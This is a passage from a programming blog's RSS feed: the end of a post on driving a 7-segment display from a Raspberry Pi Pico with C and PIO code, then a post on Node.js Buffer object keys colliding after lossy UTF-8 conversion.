<span class="hljs-keyword">const</span> uint D  = pin_map_display_to_pico[<span class="hljs-number">2</span>];
<span class="hljs-keyword">const</span> uint E  = pin_map_display_to_pico[<span class="hljs-number">1</span>];
<span class="hljs-keyword">const</span> uint F  = pin_map_display_to_pico[<span class="hljs-number">12</span>];
<span class="hljs-keyword">const</span> uint G  = pin_map_display_to_pico[<span class="hljs-number">5</span>];
<span class="hljs-keyword">const</span> uint DP = pin_map_display_to_pico[<span class="hljs-number">3</span>];
<span class="hljs-keyword">const</span> uint D5 = pin_map_display_to_pico[<span class="hljs-number">8</span>];

<span class="hljs-keyword">const</span> uint COM_1    = pin_map_display_to_pico[<span class="hljs-number">14</span>];
<span class="hljs-keyword">const</span> uint COM_2    = pin_map_display_to_pico[<span class="hljs-number">11</span>];
<span class="hljs-keyword">const</span> uint COM_3    = pin_map_display_to_pico[<span class="hljs-number">10</span>];
<span class="hljs-keyword">const</span> uint COM_4    = pin_map_display_to_pico[<span class="hljs-number">6</span>];
<span class="hljs-keyword">const</span> uint COM_DOTS = pin_map_display_to_pico[<span class="hljs-number">7</span>];
</code></pre>
<p>I skipped <code>D6</code> because it's the same as <code>D5</code>. The <code>pin_map_display_to_pico</code> array maps each display pin to the Pico GPIO it's wired to (display pins are numbered from 1, so index zero is unused). On the Pico I used GPIO pins 9 to 22.</p>
<pre class="file"><code>c_only.c
</code></pre>
<pre><code class="hljs arduino">stdio_init_all();
<span class="hljs-comment">// index 0 is unused, so start from display pin 1</span>
<span class="hljs-keyword">for</span> (uint i = <span class="hljs-number">1</span>; i &lt; <span class="hljs-keyword">sizeof</span>(pin_map_display_to_pico) / <span class="hljs-keyword">sizeof</span>(pin_map_display_to_pico[<span class="hljs-number">0</span>]); ++i) {
  gpio_init(pin_map_display_to_pico[i]);
  gpio_set_dir(pin_map_display_to_pico[i], GPIO_OUT);
}
</code></pre>
<p>Some more initialization before getting to the point: all the pins have to be initialized and set to output mode. Then we can write a long infinite loop that does almost exactly what we discussed before.</p>
<pre class="file"><code>c_only.c
</code></pre>
<pre><code class="hljs arduino"><span class="hljs-comment">// select and display the colon</span>
gpio_put(COM_DOTS, <span class="hljs-number">0</span>);
gpio_put(D5, <span class="hljs-number">1</span>);

<span class="hljs-keyword">while</span> (<span class="hljs-literal">true</span>) {
  <span class="hljs-comment">// select the first character place</span>
  gpio_put(COM_1, <span class="hljs-number">0</span>);
  gpio_put(COM_2, <span class="hljs-number">1</span>);
  gpio_put(COM_3, <span class="hljs-number">1</span>);
  gpio_put(COM_4, <span class="hljs-number">1</span>);

  <span class="hljs-comment">// display a one</span>
  gpio_put(A, <span class="hljs-number">0</span>);
  gpio_put(B, <span class="hljs-number">1</span>);
  gpio_put(C, <span class="hljs-number">1</span>);
  gpio_put(D, <span class="hljs-number">0</span>);
  gpio_put(E, <span class="hljs-number">0</span>);
  gpio_put(F, <span class="hljs-number">0</span>);
  gpio_put(G, <span class="hljs-number">0</span>);
  gpio_put(DP, <span class="hljs-number">0</span>);

  <span class="hljs-comment">// wait a bit</span>
  sleep_ms(<span class="hljs-number">2</span>);

  <span class="hljs-comment">// select the second character place</span>
  gpio_put(COM_1, <span class="hljs-number">1</span>);
  gpio_put(COM_2, <span class="hljs-number">0</span>);
  gpio_put(COM_3, <span class="hljs-number">1</span>);
  gpio_put(COM_4, <span class="hljs-number">1</span>);

  <span class="hljs-comment">// display a two</span>
  gpio_put(A, <span class="hljs-number">1</span>);
  gpio_put(B, <span class="hljs-number">1</span>);
  gpio_put(C, <span class="hljs-number">0</span>);
  gpio_put(D, <span class="hljs-number">1</span>);
  gpio_put(E, <span class="hljs-number">1</span>);
  gpio_put(F, <span class="hljs-number">0</span>);
  gpio_put(G, <span class="hljs-number">1</span>);
  gpio_put(DP, <span class="hljs-number">0</span>);

  <span class="hljs-comment">// wait a bit</span>
  sleep_ms(<span class="hljs-number">2</span>);

  <span class="hljs-comment">// select the third character place</span>
  gpio_put(COM_1, <span class="hljs-number">1</span>);
  gpio_put(COM_2, <span class="hljs-number">1</span>);
  gpio_put(COM_3, <span class="hljs-number">0</span>);
  gpio_put(COM_4, <span class="hljs-number">1</span>);

  <span class="hljs-comment">// display a three</span>
  gpio_put(A, <span class="hljs-number">1</span>);
  gpio_put(B, <span class="hljs-number">1</span>);
  gpio_put(C, <span class="hljs-number">1</span>);
  gpio_put(D, <span class="hljs-number">1</span>);
  gpio_put(E, <span class="hljs-number">0</span>);
  gpio_put(F, <span class="hljs-number">0</span>);
  gpio_put(G, <span class="hljs-number">1</span>);
  gpio_put(DP, <span class="hljs-number">0</span>);

  <span class="hljs-comment">// wait a bit</span>
  sleep_ms(<span class="hljs-number">2</span>);

  <span class="hljs-comment">// select the fourth character place</span>
  gpio_put(COM_1, <span class="hljs-number">1</span>);
  gpio_put(COM_2, <span class="hljs-number">1</span>);
  gpio_put(COM_3, <span class="hljs-number">1</span>);
  gpio_put(COM_4, <span class="hljs-number">0</span>);

  <span class="hljs-comment">// display a four</span>
  gpio_put(A, <span class="hljs-number">0</span>);
  gpio_put(B, <span class="hljs-number">1</span>);
  gpio_put(C, <span class="hljs-number">1</span>);
  gpio_put(D, <span class="hljs-number">0</span>);
  gpio_put(E, <span class="hljs-number">0</span>);
  gpio_put(F, <span class="hljs-number">1</span>);
  gpio_put(G, <span class="hljs-number">1</span>);
  gpio_put(DP, <span class="hljs-number">0</span>);

  <span class="hljs-comment">// wait a bit</span>
  sleep_ms(<span class="hljs-number">2</span>);
}
</code></pre>
<p>The only difference is that the colon doesn't share any pins with the other characters, so we can turn it on at the very beginning and forget about it. It's worth noticing that this way the <code>:</code> is brighter than the rest of the characters: it's lit all the time, while each digit is lit only during one of the four <code>sleep_ms(2)</code> slots.</p>
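<p>A quick back-of-the-envelope calculation shows the difference, assuming the time spent in the <code>gpio_put</code> calls is negligible compared to the 2 ms sleeps:</p>
<pre><code class="hljs python">PLACES = 4      # character places visited by the loop
STEP_MS = 2     # sleep_ms(2) after each place

cycle_ms = PLACES * STEP_MS      # one full pass over all four places
refresh_hz = 1000 / cycle_ms     # how often each digit gets redrawn
digit_duty = STEP_MS / cycle_ms  # fraction of time a single digit is lit
colon_duty = 1.0                 # the colon is never switched off

print(cycle_ms, refresh_hz, digit_duty, colon_duty)  # 8 125.0 0.25 1.0
</code></pre>
<p>So each digit is on about a quarter of the time, the colon all of the time, and the whole display is redrawn roughly 125 times per second.</p>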
<h3>A little bit of PIO</h3>
<p>I wanted to start with something simple here as well, just to check that everything works properly. The code for this is also on <a href="https://github.com/deadlime/pico-7-segment-display/tree/main/2_basic-pio">Github</a>.</p>
<pre class="file"><code>basic_pio.pio
</code></pre>
<pre><code class="hljs armasm"><span class="hljs-symbol">.program</span> <span class="hljs-keyword">basic_pio
</span>
<span class="hljs-symbol">.define</span> PUBLIC pin_count <span class="hljs-number">14</span>
<span class="hljs-symbol">
loop:</span>
  pull
  out pins, pin_count
  jmp loop
</code></pre>
<p>The <code>pull</code> instruction fetches the 32 bits of data sent by the C code (blocking until the data arrives), then <code>out</code> writes 14 of those bits to the output pins (the remaining bits are simply overwritten by the next <code>pull</code>), and the whole thing starts over. The publicly defined <code>pin_count</code> is accessible from the C code as <code>basic_pio_pin_count</code>.</p>
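<p>To make the data flow a bit more concrete, here is a small Python model of what <code>pull</code> followed by <code>out pins, 14</code> does with a 32-bit word. It's only a sketch. It assumes that the output shift register shifts to the right, which I believe is the default in the configuration the SDK generates, so <code>out</code> takes the least significant bits first. The <code>out</code> function and the example value are made up for illustration.</p>
<pre><code class="hljs python">PIN_COUNT = 14  # same value as basic_pio_pin_count


def out(osr, bit_count):
    """Model of `out pins, bit_count` with the OSR shifting to the right.

    Returns the bits driven onto the pins and what is left in the OSR.
    """
    remaining, pin_bits = divmod(osr, 2 ** bit_count)
    return pin_bits, remaining


# pull: an example word from the C code lands in the OSR
# (three junk bits on top of the 14 bits we care about)
osr = int("101" + "00010000000010", 2)

pins, osr = out(osr, PIN_COUNT)
print(f"{pins:014b}")  # 00010000000010 (pin 22 on the left, pin 9 on the right)
print(f"{osr:b}")      # 101, simply overwritten by the next pull
</code></pre>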
<p>Where do we specify the pins in use? The PIO file has a little bit of C code that sets up the whole program (I wouldn't say I like mixing languages in a single file, and CLion didn't like it either, but that's the way it is):</p>
<pre class="file"><code>basic_pio.pio
</code></pre>
<pre><code class="hljs arduino">% c-sdk {
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">basic_pio_program_init</span><span class="hljs-params">(PIO pio, uint sm, uint offset, uint pin)</span> </span>{
  pio_sm_config <span class="hljs-built_in">config</span> = basic_pio_program_get_default_config(offset);

  sm_config_set_out_pins(&amp;<span class="hljs-built_in">config</span>, pin, basic_pio_pin_count);

  <span class="hljs-keyword">for</span> (uint i = <span class="hljs-number">0</span>; i &lt; basic_pio_pin_count; ++i) {
    pio_gpio_init(pio, pin + i);
  }
  pio_sm_set_consecutive_pindirs(pio, sm, pin, basic_pio_pin_count, <span class="hljs-literal">true</span>);

  pio_sm_init(pio, sm, offset, &amp;<span class="hljs-built_in">config</span>);
  pio_sm_set_enabled(pio, sm, <span class="hljs-literal">true</span>);
}
%}
</code></pre>
<p>Next is the C code that uses this PIO program. We send 32 bits of data to the program, but only 14 of them are actually used: they define the states of the 14 pins. The rightmost (least significant) bit is the value of pin 9, and the leftmost of the 14 bits is the value of pin 22.</p>
<pre><code class="hljs arduino"><span class="hljs-comment">//                             pin 9</span>
<span class="hljs-comment">//                                 v</span>
uint example_data = <span class="hljs-number">0b00010000000010</span>;
<span class="hljs-comment">//                    ^</span>
<span class="hljs-comment">//                    pin 22</span>
</code></pre>
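<p>Reading binary literals like this by eye is error-prone. Here is a tiny, hypothetical Python helper that lists which GPIOs a 14-bit value drives high. It assumes the same layout: pin 9 at the rightmost bit and 14 consecutive pins.</p>
<pre><code class="hljs python">START_PIN = 9
PIN_COUNT = 14


def high_pins(value):
    """List the GPIOs set to 1 by a 14-bit value (rightmost bit = START_PIN)."""
    bits = f"{value:0{PIN_COUNT}b}"[::-1]  # reversed, so index 0 is the rightmost bit
    return [START_PIN + index for index, bit in enumerate(bits) if bit == "1"]


example_data = 0b00010000000010
print(high_pins(example_data))  # [10, 19]
</code></pre>
<p>For <code>example_data</code>, that gives pins 10 and 19. According to the constants below, these are the <code>B</code> and <code>C</code> segments.</p>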
<p>We can define some helper constants to construct the numbers more easily. Defining the COMs is a bit strange because the COM pins are active low. To select a character place, we have to set all the <em>other</em> COMs to one, not the one we want to use.</p>
<pre class="file"><code>basic_pio.c
</code></pre>
<pre><code class="hljs arduino"><span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> START_PIN 9</span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> A  1 &lt;&lt; (14 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> B  1 &lt;&lt; (10 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> C  1 &lt;&lt; (19 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> D  1 &lt;&lt; (17 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> E  1 &lt;&lt; (16 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> F  1 &lt;&lt; (13 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> G  1 &lt;&lt; (20 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> DP 1 &lt;&lt; (18 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> D5 1 &lt;&lt; (9 - START_PIN)</span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> COM_1    1 &lt;&lt; (15 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> COM_2    1 &lt;&lt; (12 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> COM_3    1 &lt;&lt; (11 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> COM_4    1 &lt;&lt; (21 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> COM_DOTS 1 &lt;&lt; (22 - START_PIN)</span>

<span class="hljs-keyword">const</span> uint one   = B|C|D5;
<span class="hljs-keyword">const</span> uint two   = A|B|D|E|G;
<span class="hljs-keyword">const</span> uint three = A|B|C|D|G;
<span class="hljs-keyword">const</span> uint four  = B|C|F|G|DP;

<span class="hljs-keyword">const</span> uint com_1 = COM_2|COM_3|COM_4;
<span class="hljs-keyword">const</span> uint com_2 = COM_1|COM_3|COM_4|COM_DOTS;
<span class="hljs-keyword">const</span> uint com_3 = COM_1|COM_2|COM_4|COM_DOTS;
<span class="hljs-keyword">const</span> uint com_4 = COM_1|COM_2|COM_3|COM_DOTS;
</code></pre>
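<p>A little trick here is that we hid the <code>:</code> in the <code>one</code> constant. <code>com_1</code> is the only selection that leaves <code>COM_DOTS</code> low, so the colon is lit only while the first character is displayed. This also gets rid of the brighter <code>:</code> problem.</p>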
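<p>The constants can be sanity-checked away from the Pico too. The Python sketch below copies the GPIO numbers from the <code>#define</code> lines above. The <code>mask</code>, <code>select</code>, and <code>is_high</code> helpers are my own hypothetical names. The sketch rebuilds <code>one</code> and <code>com_1</code> and checks which COMs stay low for the first character.</p>
<pre><code class="hljs python">START_PIN = 9

# GPIO numbers copied from the #define lines above
SEGMENT_PINS = {"A": 14, "B": 10, "C": 19, "D": 17, "E": 16,
                "F": 13, "G": 20, "DP": 18, "D5": 9}
COM_PINS = {"COM_1": 15, "COM_2": 12, "COM_3": 11, "COM_4": 21, "COM_DOTS": 22}


def mask(*pins):
    """Set the bit of every given GPIO, counted from START_PIN."""
    value = 0
    for pin in pins:
        value |= 2 ** (pin - START_PIN)
    return value


def select(*selected):
    """COMs are active low: drive every COM high except the selected ones."""
    return mask(*(pin for name, pin in COM_PINS.items() if name not in selected))


def is_high(value, pin):
    """Check whether the bit belonging to a GPIO is set."""
    return (value // 2 ** (pin - START_PIN)) % 2 == 1


one = mask(SEGMENT_PINS["B"], SEGMENT_PINS["C"], SEGMENT_PINS["D5"])
com_1 = select("COM_1", "COM_DOTS")  # same as COM_2|COM_3|COM_4 in the C code

frame = com_1 | one
print(f"{frame:014b}")  # 01010000001111

low_coms = [name for name, pin in COM_PINS.items() if not is_high(frame, pin)]
print(low_coms)  # ['COM_1', 'COM_DOTS']
</code></pre>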
<p>To use the PIO program, we have to include the header file generated by CMake. For me, this was an <code>#include &quot;basic_pio.pio.h&quot;</code> line at the top of the C file. Then we can continue with setting up the program.</p>
<pre class="file"><code>basic_pio.c
</code></pre>
<pre><code class="hljs arduino"><span class="hljs-keyword">const</span> PIO pio = pio0;

<span class="hljs-keyword">const</span> uint offset = pio_add_program(pio, &amp;basic_pio_program);
<span class="hljs-keyword">const</span> uint sm = pio_claim_unused_sm(pio, <span class="hljs-literal">true</span>);

basic_pio_program_init(pio, sm, offset, START_PIN);
</code></pre>
<p>We add the program, claim a state machine of our own, and initialize it.</p>
<p>Now only the display logic is left. It's a bit shorter than the C-only solution, but it does basically the same thing.</p>
<pre class="file"><code>basic_pio.c
</code></pre>
<pre><code class="hljs arduino"><span class="hljs-keyword">while</span> (<span class="hljs-literal">true</span>) {
  pio_sm_put(pio, sm, com_1|one);
  sleep_ms(<span class="hljs-number">2</span>);
  pio_sm_put(pio, sm, com_2|two);
  sleep_ms(<span class="hljs-number">2</span>);
  pio_sm_put(pio, sm, com_3|three);
  sleep_ms(<span class="hljs-number">2</span>);
  pio_sm_put(pio, sm, com_4|four);
  sleep_ms(<span class="hljs-number">2</span>);
}
</code></pre>
<h3>The final result</h3>
<p>In the last example, the timing of the display was still handled by the C code. That is not ideal if you also want the code to do something besides driving the display. It would be nice if we could just pass all the data to the PIO and let it take care of everything display-related.</p>
<p>To display all four characters, we need four times 14 bits of data, so a single 32-bit value won't be enough. Luckily, the state machine has two scratch registers we can use (<code>x</code> and <code>y</code>), so we can send the content of the display as two 28-bit values. The PIO program stores them in the two registers and sends them out to the GPIO in 14-bit chunks with the right timing.</p>
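<p>Here is a quick Python sketch of that packing. The <code>pack</code> and <code>unpack</code> names are hypothetical. Multiplying by <code>2 ** 14</code> is the same as the <code>&lt;&lt; 14</code> shift in the C code. As before, the sketch assumes that the OSR shifts to the right, so the low 14 bits are the ones sent out first.</p>
<pre><code class="hljs python">PIN_COUNT = 14
FRAME_SIZE = 2 ** PIN_COUNT  # number of different 14-bit values


def pack(first_out, second_out):
    """Combine two 14-bit frames into one 28-bit word for pio_sm_put."""
    for frame in (first_out, second_out):
        if frame not in range(FRAME_SIZE):
            raise ValueError(f"{frame} does not fit into {PIN_COUNT} bits")
    return second_out * FRAME_SIZE + first_out


def unpack(word):
    """Split a word into frames in the order the two `out` instructions emit them."""
    second_out, first_out = divmod(word, FRAME_SIZE)
    return first_out, second_out


word = pack(0b00000000000011, 0b11000000000000)
print(word.bit_length())  # 28, so two words hold all four characters
print(unpack(word) == (0b00000000000011, 0b11000000000000))  # True
</code></pre>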
<pre class="file"><code>advanced_pio.pio
</code></pre>
<pre><code class="hljs armasm"><span class="hljs-symbol">.program</span> advanced_pio

<span class="hljs-symbol">.define</span> PUBLIC pin_count <span class="hljs-number">14</span>

<span class="hljs-symbol">.wrap_target</span>
  <span class="hljs-keyword">mov </span>isr, x
  <span class="hljs-keyword">mov </span>x, y
  <span class="hljs-keyword">mov </span>y, isr

  pull noblock
  <span class="hljs-keyword">mov </span>x, osr

  out pins, pin_count [<span class="hljs-number">5</span>]
  out pins, pin_count
<span class="hljs-symbol">.wrap</span>
</code></pre>
<p>The <code>.wrap_target</code>/<code>.wrap</code> part works just like a <code>loop:</code>/<code>jmp loop</code> around the whole thing, but it doesn't cost an extra instruction.</p>
<p>In the first block, we swap the contents of the <code>x</code> and <code>y</code> registers, using the <code>isr</code> (Input Shift Register) as temporary storage. That's not a problem, because we don't use it otherwise (it would hold the data read from the GPIO pins if we were using them as inputs).</p>
<p>Next comes a non-blocking <code>pull</code>. It moves the data coming from the C code into the <code>osr</code> (Output Shift Register, which holds the data going to the GPIO pins). A nice property of a non-blocking <code>pull</code> is that when there is no data in the TX FIFO, it copies the contents of the <code>x</code> register into the <code>osr</code> instead. The following <code>mov x, osr</code> stores the result back in <code>x</code>, so when there is no new data, we simply keep displaying the old data.</p>
<p>Then we send 14 bits of data to the pins twice. The <code>[5]</code> at the end of the first <code>out</code> is a five-cycle delay. It matches the five single-cycle instructions that run between the second <code>out</code> and the next first <code>out</code>, so from the display's point of view, each character stays on for the same amount of time.</p>
<p>The end result is that we display the data from <code>x</code> and <code>y</code> in turns, and we also update the two registers in turns.</p>
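<p>The register juggling is easier to follow step by step, so below is a rough Python simulation of the loop. It's a model, not the real hardware. It assumes that both words are already waiting in the TX FIFO when the loop starts. On the Pico, the state machine is enabled before the C code sends them, so the first few iterations probably output zeros. It also assumes right shifting, as before. The <code>simulate</code> function is my own naming.</p>
<pre><code class="hljs python">from collections import deque

PIN_COUNT = 14
FRAME_SIZE = 2 ** PIN_COUNT


def simulate(words, iterations):
    """Run the advanced_pio loop `iterations` times and collect the 14-bit
    values written to the pins. `words` start out in the TX FIFO."""
    fifo = deque(words)
    x = y = 0  # scratch registers
    shown = []
    for _ in range(iterations):
        # mov isr, x / mov x, y / mov y, isr: swap x and y via the ISR
        isr = x
        x = y
        y = isr
        # pull noblock: take the next FIFO entry, or copy x if the FIFO is empty
        osr = fifo.popleft() if fifo else x
        # mov x, osr: remember the value for later loops
        x = osr
        # out pins, 14 (twice): the low 14 bits go out first
        for _ in range(2):
            osr, frame = divmod(osr, FRAME_SIZE)
            shown.append(frame)
    return shown


# frames 1 to 4 stand in for com_1|one, com_2|two, and so on,
# packed the same way as in the C code
words = [1 * FRAME_SIZE + 2, 3 * FRAME_SIZE + 4]
print(simulate(words, 4))  # [2, 1, 4, 3, 2, 1, 4, 3]
</code></pre>
<p>Even after the FIFO runs dry in the third iteration, the two words keep taking turns.</p>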
<p>And of course we have a similar initialization function for this PIO program as well.</p>
<pre class="file"><code>advanced_pio.pio
</code></pre>
<pre><code class="hljs arduino">% c-sdk {
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">"hardware/clocks.h"</span></span>

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">advanced_pio_program_init</span><span class="hljs-params">(PIO pio, uint sm, uint offset, uint pin)</span> </span>{
  pio_sm_config <span class="hljs-built_in">config</span> = advanced_pio_program_get_default_config(offset);

  sm_config_set_out_pins(&amp;<span class="hljs-built_in">config</span>, pin, advanced_pio_pin_count);

  <span class="hljs-keyword">float</span> clock_divider = (<span class="hljs-keyword">float</span>) clock_get_hz(clk_sys) / <span class="hljs-number">2000000</span>;
  sm_config_set_clkdiv(&amp;<span class="hljs-built_in">config</span>, clock_divider);

  <span class="hljs-keyword">for</span> (uint i = <span class="hljs-number">0</span>; i &lt; advanced_pio_pin_count; ++i) {
    pio_gpio_init(pio, pin + i);
  }
  pio_sm_set_consecutive_pindirs(pio, sm, pin, advanced_pio_pin_count, <span class="hljs-literal">true</span>);

  pio_sm_init(pio, sm, offset, &amp;<span class="hljs-built_in">config</span>);
  pio_sm_set_enabled(pio, sm, <span class="hljs-literal">true</span>);
}
%}
</code></pre>
<p>The only difference is that we call the <code>sm_config_set_clkdiv</code> function to slow the state machine down to 2 MHz, regardless of the system clock, so the characters on the display alternate at the right pace.</p>
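<p>Here is a back-of-the-envelope timing check in Python. It is based on my own cycle counting: every instruction in the loop takes one cycle, plus the five delay cycles after the first <code>out</code>. The 125 MHz system clock below is only an example value, to show what the divider works out to.</p>
<pre><code class="hljs python">SM_CLOCK_HZ = 2_000_000           # clk_sys / clock_divider in advanced_pio_program_init
EXAMPLE_CLK_SYS_HZ = 125_000_000  # assumption: an example system clock

INSTRUCTIONS_PER_LOOP = 7                     # 3 x mov, pull, mov, 2 x out
CYCLES_PER_LOOP = INSTRUCTIONS_PER_LOOP + 5   # plus the [5] delay
CYCLES_PER_CHARACTER = CYCLES_PER_LOOP // 2   # the two `out`s are evenly spaced
CYCLES_PER_REFRESH = 2 * CYCLES_PER_LOOP      # x and y take turns: 4 characters per 2 loops

character_us = CYCLES_PER_CHARACTER * 1_000_000 / SM_CLOCK_HZ
refresh_hz = SM_CLOCK_HZ / CYCLES_PER_REFRESH

print(EXAMPLE_CLK_SYS_HZ / SM_CLOCK_HZ)  # 62.5, the clock divider for this example
print(f"each character is lit for {character_us:g} us")          # 3 us
print(f"the whole display is refreshed at {refresh_hz:.0f} Hz")  # 83333 Hz
</code></pre>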
<pre class="file"><code>advanced_pio.c
</code></pre>
<pre><code class="hljs arduino">pio_sm_put(pio, sm, ((com_1|one) &lt;&lt; advanced_pio_pin_count) | com_2|two);
pio_sm_put(pio, sm, ((com_3|three) &lt;&lt; advanced_pio_pin_count) | com_4|four);

<span class="hljs-keyword">while</span> (<span class="hljs-literal">true</span>) {
  sleep_ms(<span class="hljs-number">1000</span>);
}
</code></pre>
<p>Most of the C code is the same as in the last example; we only changed the part around the infinite loop. We send the data to the PIO program just once. After that, the C code is free to do anything else, and the display keeps being updated regardless. The code for this example is also on <a href="https://github.com/deadlime/pico-7-segment-display/tree/main/3_advanced-pio">Github</a>.</p>

]]></content:encoded>
        </item>
            <item>
            <title>Key questions</title>
            <link>https://deadlime.hu/en/2022/10/20/key-questions/</link>
            <pubDate>Thu, 20 Oct 2022 18:13:00 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[JavaScript]]></category>
                    
            <guid isPermaLink="false">735aa30c40c798acd14ea30850e993aa</guid>
            <description>Not every data is what it seems to be</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/mailboxes.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>There is an ancient Mayan saying that computers can solve a lot of problems that we wouldn't have to solve without them. Today, we can sink our teeth into a problem just like that. It pairs really well with this lightning talk from 2012 called <a href="https://www.destroyallsoftware.com/talks/wat">Wat</a>.</p>
<p>My own Wat moment started with the <code>Buffer</code> class. Let's create two buffers right away.</p>
<pre><code class="hljs shell"><span class="hljs-meta">$</span><span class="bash"> node</span>
<span class="hljs-meta">&gt;</span><span class="bash"> data1 = Buffer.from([0xf5, 0xcf, 0xe2, 0xf0, 0xef])</span>
&lt;Buffer f5 cf e2 f0 ef&gt;
<span class="hljs-meta">&gt;</span><span class="bash"> data2 = Buffer.from([0xfe, 0x99, 0x88, 0xeb, 0xd9])</span>
&lt;Buffer fe 99 88 eb d9&gt;
</code></pre>
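<p>It's clearly visible to the naked eye that these are indeed two different buffers, and Node.js can confirm it for us too. Strictly speaking, <code>===</code> only compares object identity. <code>data1.equals(data2)</code> would compare the contents, and it returns <code>false</code> as well:</p>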
<pre><code class="hljs shell"><span class="hljs-meta">&gt;</span><span class="bash"> data1 === data2</span>
false
</code></pre>
<p>That's all nice and shiny, but let's look at another example.</p>
<pre><code class="hljs shell"><span class="hljs-meta">&gt;</span><span class="bash"> container = {}</span>
{}
<span class="hljs-meta">&gt;</span><span class="bash"> container[data1] = <span class="hljs-string">'foo'</span></span>
'foo'
<span class="hljs-meta">&gt;</span><span class="bash"> container[data2]</span>
???
</code></pre>
<p>What will be the value of the last expression?</p>
<p>a) <code>null</code><br />
b) <code>undefined</code><br />
c) it creates a black hole in place of the node interpreter<br />
d) nothing</p>
<p>Many people would probably go with <code>b</code>. Someone who knows Node.js a bit better might pick <code>c</code>. But the right answer is so terrible that it's not even an option.</p>
<pre><code class="hljs shell"><span class="hljs-meta">&gt;</span><span class="bash"> container[data2]</span>
'foo'
</code></pre>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/wat.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>What happens behind the scenes? An object key cannot be a <code>Buffer</code>, so JavaScript automatically converts it to a string by calling its <code>toString</code> method. For a <code>Buffer</code>, <code>toString</code> takes an optional <code>encoding</code> parameter. If it doesn't get one, it defaults to <code>utf8</code>.</p>
<p>Our good-looking byte array is not a well-formed UTF-8 string (that's why it was chosen for this example), so each of its bytes is replaced with the Unicode replacement character, which looks like this: �.</p>
<p>Both of our buffers are equally ignorant in this regard, so after the conversion, each one becomes a string of five replacement characters.</p>
<pre><code class="hljs shell"><span class="hljs-meta">&gt;</span><span class="bash"> data1.toString() === data2.toString()</span>
true
<span class="hljs-meta">&gt;</span><span class="bash"> container</span>
{ '�����': 'foo' }
</code></pre>
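<p>The same collision is easy to reproduce outside Node.js. Below is a Python sketch that mimics the implicit conversion by decoding the bytes as UTF-8 and replacing invalid sequences. The <code>lossy_key</code> name is made up. Python's decoder is not guaranteed to behave exactly like Node.js for every input, but for these two buffers it also produces five replacement characters each.</p>
<pre><code class="hljs python">data1 = bytes([0xF5, 0xCF, 0xE2, 0xF0, 0xEF])
data2 = bytes([0xFE, 0x99, 0x88, 0xEB, 0xD9])


def lossy_key(data):
    """Decode as UTF-8 and replace invalid sequences with U+FFFD."""
    return data.decode("utf-8", errors="replace")


print(lossy_key(data1) == "\ufffd" * 5)      # True
print(lossy_key(data1) == lossy_key(data2))  # True

container = {lossy_key(data1): "foo"}
print(container.get(lossy_key(data2)))  # foo
</code></pre>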
<p>After all this, it makes sense that we get back the value stored for the first buffer when we use the second one as the key. Now imagine this happening deep down in an in-memory cache layer. The only symptom you see is that sometimes, maybe once in a hundred thousand cases, the data coming from the cache is wrong. It's a really fun experience.</p>
<p>What could we do about this? Maybe we are better off not using a <code>Buffer</code> as a key. If we really need to, we can call <code>toString</code> with a different <code>encoding</code> parameter, one that turns different byte sequences into different strings. Any of the examples below would work in this case:</p>
<pre><code class="hljs shell"><span class="hljs-meta">&gt;</span><span class="bash"> data1.toString(<span class="hljs-string">'hex'</span>) === data2.toString(<span class="hljs-string">'hex'</span>)</span>
false
<span class="hljs-meta">&gt;</span><span class="bash"> data1.toString(<span class="hljs-string">'base64'</span>) === data2.toString(<span class="hljs-string">'base64'</span>)</span>
false
<span class="hljs-meta">&gt;</span><span class="bash"> data1.toString(<span class="hljs-string">'binary'</span>) === data2.toString(<span class="hljs-string">'binary'</span>)</span>
false
</code></pre>
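<p>The fix translates to Python as well. In this sketch, each encoding maps different byte sequences to different strings. The <code>encoders</code> dict is only for illustration, and Node.js's <code>'binary'</code> is an alias for <code>'latin1'</code>. Python's <code>bytes</code> objects are also hashable, so they can be used as dictionary keys directly, without any conversion.</p>
<pre><code class="hljs python">import base64

data1 = bytes([0xF5, 0xCF, 0xE2, 0xF0, 0xEF])
data2 = bytes([0xFE, 0x99, 0x88, 0xEB, 0xD9])

# Lossless conversions: different bytes always give different strings
encoders = {
    "hex": bytes.hex,
    "base64": lambda data: base64.b64encode(data).decode("ascii"),
    "latin-1": lambda data: data.decode("latin-1"),  # 'binary'/'latin1' in Node.js
}

for name, encode in encoders.items():
    print(name, encode(data1) == encode(data2))  # False for each encoding

# bytes are hashable in Python, so no conversion is needed at all
cache = {data1: "foo"}
print(cache.get(data2))  # None
</code></pre>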

]]></content:encoded>
        </item>
            <item>
            <title>Migration and madness</title>
            <link>https://deadlime.hu/en/2022/06/07/migration-and-madness/</link>
            <pubDate>Wed, 08 Jun 2022 15:26:35 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Docker Swarm]]></category>
                    <category><![CDATA[Git]]></category>
